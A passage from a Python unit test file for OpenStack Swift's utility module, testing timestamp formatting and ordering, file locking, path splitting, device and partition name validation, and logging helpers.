utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.91203_00000000'),
utils.Timestamp('1402436408.91203_00000000', offset=0),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.normal, expected)
# timestamp instance can also compare to string or float
self.assertEqual(timestamp, expected)
self.assertEqual(timestamp, float(expected))
self.assertEqual(timestamp, utils.normalize_timestamp(expected))
def test_isoformat(self):
expected = '2014-06-10T22:47:32.054580'
test_values = (
'1402440452.05458',
'1402440452.054579',
'1402440452.05458_00000000',
'1402440452.054579_00000000',
'1402440452.054580000',
'1402440452.054579999',
'1402440452.054580000_0000000000000',
'1402440452.054579999_0000ff00',
'000001402440452.054580000',
'000001402440452.0545799',
'000001402440452.054580000_0000000000',
'000001402440452.054579999999_00000fffff',
1402440452.05458,
1402440452.054579,
1402440452.0545800000000000,
1402440452.054579999,
utils.Timestamp(1402440452.05458),
utils.Timestamp(1402440452.0545799),
utils.Timestamp(1402440452.05458, offset=0),
utils.Timestamp(1402440452.05457999999, offset=0),
utils.Timestamp(1402440452.05458, offset=100),
utils.Timestamp(1402440452.054579, offset=100),
utils.Timestamp('1402440452.05458'),
utils.Timestamp('1402440452.054579999'),
utils.Timestamp('1402440452.05458', offset=0),
utils.Timestamp('1402440452.054579', offset=0),
utils.Timestamp('1402440452.05458', offset=300),
utils.Timestamp('1402440452.05457999', offset=300),
utils.Timestamp('1402440452.05458_00000000'),
utils.Timestamp('1402440452.05457999_00000000'),
utils.Timestamp('1402440452.05458_00000000', offset=0),
utils.Timestamp('1402440452.05457999_00000aaa', offset=0),
utils.Timestamp('1402440452.05458_00000000', offset=400),
utils.Timestamp('1402440452.054579_0a', offset=400),
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
expected = '1970-01-01T00:00:00.000000'
test_values = (
'0',
'0000000000.00000',
'0000000000.00000_ffffffffffff',
0,
0.0,
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
def test_not_equal(self):
ts = '1402436408.91203_0000000000000001'
test_values = (
utils.Timestamp('1402436408.91203_0000000000000002'),
utils.Timestamp('1402436408.91203'),
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91204),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.91203, offset=2),
)
for value in test_values:
self.assertTrue(value != ts)
def test_no_force_internal_no_offset(self):
"""Test that internal is the same as normal with no offset"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(0).internal,
utils.normalize_timestamp(0))
def test_no_force_internal_with_offset(self):
"""Test that internal always includes the offset if significant"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=240).internal,
'1402437380.58186_00000000000000f0')
self.assertEqual(
utils.Timestamp('1402437380.581859_00000001',
offset=240).internal,
'1402437380.58186_00000000000000f1')
def test_force_internal(self):
"""Test that internal always includes the offset if forced"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=True):
self.assertEqual(utils.Timestamp(0).internal,
'0000000000.00000_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=16).internal,
'1402437380.58186_0000000000000010')
def test_internal_format_no_offset(self):
expected = '1402436408.91203_0000000000000000'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.9120300000000000,
1402436408.912029,
1402436408.912029999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.91202999999999999, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.912029'),
utils.Timestamp('1402436408.912029', offset=0),
utils.Timestamp('1402436408.912029999999999'),
utils.Timestamp('1402436408.912029999999999', offset=0),
)
for value in test_values:
# timestamp instance is always equivalent
self.assertEqual(utils.Timestamp(value), expected)
if utils.FORCE_INTERNAL:
# the FORCE_INTERNAL flag makes the internal format always
# include the offset portion of the timestamp even when it's
# not significant and would be bad during upgrades
self.assertEqual(utils.Timestamp(value).internal, expected)
else:
# unless we FORCE_INTERNAL, when there's no offset the
# internal format is equivalent to the normalized format
self.assertEqual(utils.Timestamp(value).internal,
'1402436408.91203')
def test_internal_format_with_offset(self):
expected = '1402436408.91203_00000000000000f0'
test_values = (
'1402436408.91203_000000f0',
'1402436408.912030000_0000000000f0',
'1402436408.912029_000000f0',
'1402436408.91202999999_0000000000f0',
'000001402436408.912030000_000000000f0',
'000001402436408.9120299999_000000000f0',
utils.Timestamp(1402436408.91203, offset=240),
utils.Timestamp(1402436408.912029, offset=240),
utils.Timestamp('1402436408.91203', offset=240),
utils.Timestamp('1402436408.91203_00000000', offset=240),
utils.Timestamp('1402436408.91203_0000000f', offset=225),
utils.Timestamp('1402436408.9120299999', offset=240),
utils.Timestamp('1402436408.9120299999_00000000', offset=240),
utils.Timestamp('1402436408.9120299999_00000010', offset=224),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.internal, expected)
# can compare with offset if the string is internalized
self.assertEqual(timestamp, expected)
# if comparison value only includes the normalized portion and the
# timestamp includes an offset, it is considered greater
normal = utils.Timestamp(expected).normal
self.assertTrue(timestamp > normal,
'%r is not bigger than %r given %r' % (
timestamp, normal, value))
self.assertTrue(timestamp > float(normal),
'%r is not bigger than %f given %r' % (
timestamp, float(normal), value))
def test_raw(self):
expected = 140243640891203
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.raw)
# 'raw' does not include offset
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.raw)
def test_delta(self):
def _assertWithinBounds(expected, timestamp):
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
self.assertTrue(float(timestamp) > minimum)
self.assertTrue(float(timestamp) < maximum)
timestamp = utils.Timestamp(1402436408.91203, delta=100)
_assertWithinBounds(1402436408.91303, timestamp)
self.assertEqual(140243640891303, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=-100)
_assertWithinBounds(1402436408.91103, timestamp)
self.assertEqual(140243640891103, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=0)
_assertWithinBounds(1402436408.91203, timestamp)
self.assertEqual(140243640891203, timestamp.raw)
# delta is independent of offset
timestamp = utils.Timestamp(1402436408.91203, offset=42, delta=100)
self.assertEqual(140243640891303, timestamp.raw)
self.assertEqual(42, timestamp.offset)
# cannot go negative
self.assertRaises(ValueError, utils.Timestamp, 1402436408.91203,
delta=-140243640891203)
def test_int(self):
expected = 1402437965
test_values = (
'1402437965.91203',
'1402437965.91203_00000000',
'1402437965.912030000',
'1402437965.912030000_0000000000000',
'000001402437965.912030000',
'000001402437965.912030000_0000000000',
1402437965.91203,
1402437965.9120300000000000,
1402437965.912029,
1402437965.912029999999999999,
utils.Timestamp(1402437965.91203),
utils.Timestamp(1402437965.91203, offset=0),
utils.Timestamp(1402437965.91203, offset=500),
utils.Timestamp(1402437965.912029),
utils.Timestamp(1402437965.91202999999999999, offset=0),
utils.Timestamp(1402437965.91202999999999999, offset=300),
utils.Timestamp('1402437965.91203'),
utils.Timestamp('1402437965.91203', offset=0),
utils.Timestamp('1402437965.91203', offset=400),
utils.Timestamp('1402437965.912029'),
utils.Timestamp('1402437965.912029', offset=0),
utils.Timestamp('1402437965.912029', offset=200),
utils.Timestamp('1402437965.912029999999999'),
utils.Timestamp('1402437965.912029999999999', offset=0),
utils.Timestamp('1402437965.912029999999999', offset=100),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(int(timestamp), expected)
self.assertTrue(timestamp > expected)
def test_float(self):
expected = 1402438115.91203
test_values = (
'1402438115.91203',
'1402438115.91203_00000000',
'1402438115.912030000',
'1402438115.912030000_0000000000000',
'000001402438115.912030000',
'000001402438115.912030000_0000000000',
1402438115.91203,
1402438115.9120300000000000,
1402438115.912029,
1402438115.912029999999999999,
utils.Timestamp(1402438115.91203),
utils.Timestamp(1402438115.91203, offset=0),
utils.Timestamp(1402438115.91203, offset=500),
utils.Timestamp(1402438115.912029),
utils.Timestamp(1402438115.91202999999999999, offset=0),
utils.Timestamp(1402438115.91202999999999999, offset=300),
utils.Timestamp('1402438115.91203'),
utils.Timestamp('1402438115.91203', offset=0),
utils.Timestamp('1402438115.91203', offset=400),
utils.Timestamp('1402438115.912029'),
utils.Timestamp('1402438115.912029', offset=0),
utils.Timestamp('1402438115.912029', offset=200),
utils.Timestamp('1402438115.912029999999999'),
utils.Timestamp('1402438115.912029999999999', offset=0),
utils.Timestamp('1402438115.912029999999999', offset=100),
)
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertTrue(float(timestamp) > minimum,
'%f is not bigger than %f given %r' % (
timestamp, minimum, value))
self.assertTrue(float(timestamp) < maximum,
'%f is not smaller than %f given %r' % (
timestamp, maximum, value))
# direct comparison of timestamp works too
self.assertTrue(timestamp > minimum,
'%s is not bigger than %f given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < maximum,
'%s is not smaller than %f given %r' % (
timestamp.normal, maximum, value))
# ... even against strings
self.assertTrue(timestamp > '%f' % minimum,
'%s is not bigger than %s given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < '%f' % maximum,
'%s is not smaller than %s given %r' % (
timestamp.normal, maximum, value))
def test_false(self):
self.assertFalse(utils.Timestamp(0))
self.assertFalse(utils.Timestamp(0, offset=0))
self.assertFalse(utils.Timestamp('0'))
self.assertFalse(utils.Timestamp('0', offset=0))
self.assertFalse(utils.Timestamp(0.0))
self.assertFalse(utils.Timestamp(0.0, offset=0))
self.assertFalse(utils.Timestamp('0.0'))
self.assertFalse(utils.Timestamp('0.0', offset=0))
self.assertFalse(utils.Timestamp(00000000.00000000))
self.assertFalse(utils.Timestamp(00000000.00000000, offset=0))
self.assertFalse(utils.Timestamp('00000000.00000000'))
self.assertFalse(utils.Timestamp('00000000.00000000', offset=0))
def test_true(self):
self.assertTrue(utils.Timestamp(1))
self.assertTrue(utils.Timestamp(1, offset=1))
self.assertTrue(utils.Timestamp(0, offset=1))
self.assertTrue(utils.Timestamp('1'))
self.assertTrue(utils.Timestamp('1', offset=1))
self.assertTrue(utils.Timestamp('0', offset=1))
self.assertTrue(utils.Timestamp(1.1))
self.assertTrue(utils.Timestamp(1.1, offset=1))
self.assertTrue(utils.Timestamp(0.0, offset=1))
self.assertTrue(utils.Timestamp('1.1'))
self.assertTrue(utils.Timestamp('1.1', offset=1))
self.assertTrue(utils.Timestamp('0.0', offset=1))
self.assertTrue(utils.Timestamp(11111111.11111111))
self.assertTrue(utils.Timestamp(11111111.11111111, offset=1))
self.assertTrue(utils.Timestamp(00000000.00000000, offset=1))
self.assertTrue(utils.Timestamp('11111111.11111111'))
self.assertTrue(utils.Timestamp('11111111.11111111', offset=1))
self.assertTrue(utils.Timestamp('00000000.00000000', offset=1))
def test_greater_no_offset(self):
now = time.time()
older = now - 1
timestamp = utils.Timestamp(now)
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443112.213252, '1402443112.213252', '1402443112.213252_ffff',
older, '%f' % older, '%f_0000ffff' % older,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_greater_with_offset(self):
now = time.time()
older = now - 1
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443346.935174, '1402443346.93517', '1402443346.935169_ffff',
older, '%f' % older, '%f_0000ffff' % older,
now, '%f' % now, '%f_00000000' % now,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_smaller_no_offset(self):
now = time.time()
newer = now + 1
timestamp = utils.Timestamp(now)
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_smaller_with_offset(self):
now = time.time()
newer = now + 1
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_ordering(self):
given = [
'1402444820.62590_000000000000000a',
'1402444820.62589_0000000000000001',
'1402444821.52589_0000000000000004',
'1402444920.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589_000000000000000a',
'1402444920.62589_0000000000000002',
'1402444820.62589_0000000000000002',
'1402444820.62589_000000000000000a',
'1402444820.62590_0000000000000004',
'1402444920.62589_000000000000000a',
'1402444820.62590_0000000000000002',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000000',
'1402444920.62589',
'1402444821.62589_0000000000000004',
'1402444821.72589_0000000000000001',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62589_0000000000000004',
'1402444821.72589_0000000000000000',
'1402444821.52589_000000000000000a',
'1402444821.72589_0000000000000004',
'1402444821.62589',
'1402444821.52589_0000000000000001',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.72589_0000000000000002',
'1402444820.62589',
'1402444920.62589_0000000000000001']
expected = [
'1402444820.62589',
'1402444820.62589_0000000000000001',
'1402444820.62589_0000000000000002',
'1402444820.62589_0000000000000004',
'1402444820.62589_000000000000000a',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62590_0000000000000002',
'1402444820.62590_0000000000000004',
'1402444820.62590_000000000000000a',
'1402444821.52589',
'1402444821.52589_0000000000000001',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000004',
'1402444821.52589_000000000000000a',
'1402444821.62589',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589',
'1402444821.72589_0000000000000001',
'1402444821.72589_0000000000000002',
'1402444821.72589_0000000000000004',
'1402444821.72589_000000000000000a',
'1402444920.62589',
'1402444920.62589_0000000000000001',
'1402444920.62589_0000000000000002',
'1402444920.62589_0000000000000004',
'1402444920.62589_000000000000000a',
]
# less visual version
"""
now = time.time()
given = [
utils.Timestamp(now + i, offset=offset).internal
for i in (0, 0.00001, 0.9, 1.0, 1.1, 100.0)
for offset in (0, 1, 2, 4, 10)
]
expected = [t for t in given]
random.shuffle(given)
"""
self.assertEqual(len(given), len(expected)) # sanity
timestamps = [utils.Timestamp(t) for t in given]
# our expected values don't include insignificant offsets
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(
[t.internal for t in sorted(timestamps)], expected)
# string sorting works as well
self.assertEqual(
sorted([t.internal for t in timestamps]), expected)
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def setUp(self):
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
def test_lock_path(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1):
exc = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except LockTimeout as err:
exc = err
self.assertTrue(exc is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_lock_path_num_sleeps(self):
tmpdir = mkdtemp()
num_short_calls = [0]
exception_raised = [False]
def my_sleep(to_sleep):
if to_sleep == 0.01:
num_short_calls[0] += 1
else:
raise Exception('sleep time changed: %s' % to_sleep)
try:
with mock.patch('swift.common.utils.sleep', my_sleep):
with utils.lock_path(tmpdir):
with utils.lock_path(tmpdir):
pass
except Exception as e:
exception_raised[0] = True
self.assertTrue('sleep time changed' in str(e))
finally:
shutil.rmtree(tmpdir)
self.assertEqual(num_short_calls[0], 11)
self.assertTrue(exception_raised[0])
def test_lock_path_class(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is not None)
self.assertTrue(exc2 is None)
self.assertTrue(not success)
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is None)
self.assertTrue(exc2 is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_normalize_timestamp(self):
# Test swift.common.utils.normalize_timestamp
self.assertEqual(utils.normalize_timestamp('1253327593.48174'),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp(1253327593.48174),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp('1253327593.48'),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp(1253327593.48),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp('253327593.48'),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp(253327593.48),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp('1253327593'),
"1253327593.00000")
self.assertEqual(utils.normalize_timestamp(1253327593),
"1253327593.00000")
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_normalize_delete_at_timestamp(self):
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593.67890),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593.67890'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593.67890),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593.67890'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593.67890),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593'),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593.67890'),
'9999999999')
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_last_modified_date_to_timestamp(self):
expectations = {
'1970-01-01T00:00:00.000000': 0.0,
'2014-02-28T23:22:36.698390': 1393629756.698390,
'2011-03-19T04:03:00.604554': 1300507380.604554,
}
for last_modified, ts in expectations.items():
real = utils.last_modified_date_to_timestamp(last_modified)
self.assertEqual(real, ts, "failed for %s" % last_modified)
def test_last_modified_date_to_timestamp_when_system_not_UTC(self):
try:
old_tz = os.environ.get('TZ')
# Western Argentina Summer Time. Found in glibc manual; this
# timezone always has a non-zero offset from UTC, so this test is
# always meaningful.
os.environ['TZ'] = 'WART4WARST,J1/0,J365/25'
self.assertEqual(utils.last_modified_date_to_timestamp(
'1970-01-01T00:00:00.000000'),
0.0)
finally:
if old_tz is not None:
os.environ['TZ'] = old_tz
else:
os.environ.pop('TZ')
def test_backwards(self):
# Test swift.common.utils.backward
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = [b'123456789x12345678><123456789\n', # block larger than rest
b'123456789x123>\n', # block ends just before \n character
b'123423456789\n',
b'123456789x\n', # block ends at the end of line
b'<123456789x123456789x123\n',
b'<6789x123\n', # block ends at the beginning of the line
b'6789x1234\n',
b'1234><234\n', # block ends typically in the middle of line
b'123456789x123456789\n']
with TemporaryFile() as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEqual(line, lines[count].split(b'\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEqual([], list(utils.backward(f)))
def test_mkdirs(self):
testdir_base = mkdtemp()
testroot = os.path.join(testdir_base, 'mkdirs')
try:
self.assertTrue(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assertTrue(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assertTrue(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
finally:
rmtree(testdir_base)
def test_split_path(self):
# Test swift.common.utils.split_account_path
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEqual(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEqual(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEqual(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEqual(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEqual(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEqual(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
# Test swift.common.utils.validate_device_partition
utils.validate_device_partition('foo', 'bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '', '')
self.assertRaises(ValueError,
utils.validate_device_partition, '', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo/bar', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', 'foo/bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '.', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, '..', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '.')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '..')
try:
utils.validate_device_partition('o\nn e', 'foo')
except ValueError as err:
self.assertEqual(str(err), 'Invalid device: o%0An%20e')
try:
utils.validate_device_partition('foo', 'o\nn e')
except ValueError as err:
self.assertEqual(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
# Test swift.common.utils.NullLogger
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEqual(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
lfo_stdout = utils.LoggerFileObject(logger)
lfo_stderr = utils.LoggerFileObject(logger)
lfo_stderr = utils.LoggerFileObject(logger, 'STDERR')
print('test1')
self.assertEqual(sio.getvalue(), '')
sys.stdout = lfo_stdout
print('test2')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo_stderr
print('test4', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
sys.stdout = orig_stdout
print('test5')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
print('test6', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
sys.stderr = orig_stderr
print('test8')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
lfo_stdout.writelines(['a', 'b', 'c'])
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\n')
lfo_stdout.close()
lfo_stderr.close()
lfo_stdout.write('d')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo_stdout.flush()
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
for lfo in (lfo_stdout, lfo_stderr):
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEqual(conf, conf_file)
# assert defaults
self.assertEqual(options['verbose'], False)
self.assertTrue('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEqual(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEqual(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
